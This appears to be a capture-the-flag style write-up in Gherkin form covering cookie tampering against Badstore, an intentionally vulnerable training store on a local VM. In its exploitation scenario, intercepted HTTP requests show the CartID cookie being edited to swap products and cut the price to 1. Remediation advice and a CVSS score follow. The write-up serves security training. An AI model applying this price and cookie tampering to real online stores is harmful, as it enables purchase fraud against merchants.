## Version 1.4.1
## language: en

Feature:
  TOE:
    Badstore
  Category:
    Modification of Assumed-Immutable Data (MAID)
  Location:
    http://192.168.56.101/cgi-bin/badstore.cgi?action=submitpayment - Cookie
  CWE:
    CWE-471: Modification of Assumed-Immutable Data (MAID)
    CWE-315: Cleartext Storage of Sensitive Information in a Cookie
  Rule:
    REQ.181: https://fluidattacks.com/web/rules/181
    REQ.185: https://fluidattacks.com/web/rules/185
    REQ.300: https://fluidattacks.com/web/rules/300
  Goal:
    Read and modify sensitive information stored in cookies
  Recommendation:
    Information must be transmitted using secure protocols

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ubuntu          | 18.04.2     |
    | Mozilla Firefox | 67.0.2      |
    | Burp suite      | 1.7.36      |
  TOE information:
    Given I am accessing to the site http://192.168.56.101/cgi-bin/badstore.cgi
    And Enter to a web site that allows me to select and buy a list of products
    And The server is running MySql version 4.1.7-standard
    And Apache version 1.3.28
    And Is running on Linux 2.4.18

  Scenario: Normal use case
    Given I access to http://192.168.56.101/cgi-bin/badstore.cgi?action=whatsnew
    When I select some products
    And I fill payment information
    And I submit the information
    Then The payment process is completed [evidence](img1.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I cant make a static detection

  Scenario: Dynamic detection
    Given I send payment information in order to complete the purchase
    When I intercept HTTP request from Burp
    Then I can see sensitive information in cookies [evidence](img2.png)
    And I can modify this information
    Then I can conclude that the site doesn't encrypt sensitive information

  Scenario: Exploitation
    Given Being intercepted the following POST HTTP request with Burp
    """
    POST /cgi-bin/badstore.cgi?action=order HTTP/1.1
    Referer: http://192.168.56.101/cgi-bin/badstore.cgi?action=submitpayment
    Cookie: CartID=1561155023:3:5024:1000:1003:1005

    email=cristian%40prueba.com&ccard=5111111111111111&expdate=1234...
    """
    And Sensitive information in clear text
    When I change the three last values of the cookie (products to buy)
    And I change the total price to pay (5024 to 1) as shown below
    """
    POST /cgi-bin/badstore.cgi?action=order HTTP/1.1
    Referer: http://192.168.56.101/cgi-bin/badstore.cgi?action=submitpayment
    Cookie: CartID=1561154414:3:1:1006:1007:1008

    email=cristian%40prueba.com&ccard=5111111111111111&expdate=1234...
    """
    And Buying process finishes
    Then I see different products than i bought [evidence](img5.png)
    And I see a different total price [evidence](img5.png)
    Then I can conclude that this site is vulnerable to this kind of attacks

  Scenario: Remediation
    Given The site is using HTTP protocol to transfer the data
    And The data isn't being encrypted
    When The HTTP request is intercepted
    Then The data is readable by anyone and can be modified
    And It's neccesary to use secure protocols such as HTTPS to encrypt the info
    And Sign cookies that shouldn't be modified
    And Verify that their content is unaltered
    And Use secure options such as Secure and HttpOnly in the creation process
    Then The information won't be read so easily
    And The information won't be modified

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.5/10 (Medium) - E:P/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.7/10 (Medium) - CR:H/IR:H/AR:L/MAC:H

  Scenario: Correlations
    No correlations have been found to this date 2019-06-20
